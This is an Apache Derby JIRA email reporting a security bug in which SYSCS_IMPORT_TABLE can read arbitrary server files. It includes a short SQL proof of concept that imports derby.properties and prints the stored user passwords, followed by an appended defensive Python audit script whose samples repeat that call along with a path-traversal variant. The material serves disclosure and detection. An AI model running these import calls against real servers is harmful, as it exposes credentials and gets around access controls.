From: "Dag H. Wanvik (JIRA)"
To: derby-dev@db.apache.org
Subject: [jira] Updated: (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files
Date: Wed, 1 Jul 2009 09:59:47 -0700 (PDT)
Message-ID: <258702863.1246467587319.JavaMail.jira@brutus>
In-Reply-To: <22738087.1173465070154.JavaMail.jira@brutus>

     [ https://issues.apache.org/jira/browse/DERBY-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Dag H. Wanvik updated DERBY-2436:
---------------------------------

    Bug behavior facts: [Regression, Security]  (was: [Regression])

> SYSCS_IMPORT_TABLE can be used to read derby files
> --------------------------------------------------
>
>                 Key: DERBY-2436
>                 URL: https://issues.apache.org/jira/browse/DERBY-2436
>             Project: Derby
>          Issue Type: Bug
>          Components: Tools
>    Affects Versions: 10.1.2.1, 10.2.1.6, 10.3.1.4
>            Reporter: Daniel John Debrunner
>            Priority: Critical
>
> There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permission to access. E.g. even with the secure-by-default network server I can execute three lines of SQL to view the contents of derby.properties, thus seeing passwords of other users, or the address of the LDAP server.
> create table t (c varchar(32000));
> CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);
> ij> select * from T;
> C
> ----------------------------------------------
> derby.connection.requireAuthentication=true
> derby.authentication.provider=BUILTIN
> derby.user.SA=sapwd
> derby.user.MARY=marypwd
> Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially now that binary data can be exported/imported.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
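
An added example, not part of the original message and not Derby code: a lexical audit of captured SQL statement text that pulls out the file-name argument (the third, as in the call quoted in the issue) of each SYSCS_UTIL.SYSCS_IMPORT_TABLE call and flags names that resolve outside an approved import directory. `ALLOWED_DIR`, `SERVER_CWD` and the sample statements are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumptions (not from the issue): staging directory and server working directory.
ALLOWED_DIR = "/srv/derby/import"
SERVER_CWD = "/srv/derby"
CALL_RE = re.compile(r"SYSCS_UTIL\s*\.\s*SYSCS_IMPORT_TABLE\s*\(", re.IGNORECASE)

def split_args(sql, start):
    """Split the argument list starting just past '('; None if unterminated."""
    args, cur, depth, in_str = [], [], 0, False
    for ch in sql[start:]:
        if ch == "'":
            in_str = not in_str  # a doubled '' toggles twice, staying in the literal
        elif not in_str and ch == "(":
            depth += 1
        elif not in_str and ch == ")":
            if depth == 0:
                return args + ["".join(cur).strip()]
            depth -= 1
        elif not in_str and ch == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)

def audit(statement):
    """Return (file, verdict) per import call. Lexical only: symlinks are not resolved."""
    findings = []
    for m in CALL_RE.finditer(statement):
        args = split_args(statement, m.end())
        raw = args[2] if args and len(args) >= 3 else None
        if raw is None or len(raw) < 2 or not (raw[0] == raw[-1] == "'"):
            findings.append((raw, "review"))  # parameter marker, expression or garbled
            continue
        name = raw[1:-1].replace("''", "'")
        path = posixpath.normpath(posixpath.join(SERVER_CWD, name))
        verdict = "ok" if path.startswith(ALLOWED_DIR + "/") else "outside import directory"
        findings.append((path, verdict))
    return findings

SAMPLES = [  # constructed statements; the first is the call quoted in the issue
    "CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0)",
    "call syscs_util.syscs_import_table(NULL, 'T', 'import/orders.csv', NULL, NULL, NULL, 0)",
    "CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', '/srv/derby/import/../derby.properties', NULL, NULL, NULL, 0)",
    "CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', ?, NULL, NULL, NULL, 0)",
]
for s in SAMPLES:
    print(audit(s))
```

A "review" verdict means the file name was not a string literal in the statement text, so the path cannot be judged from the text alone.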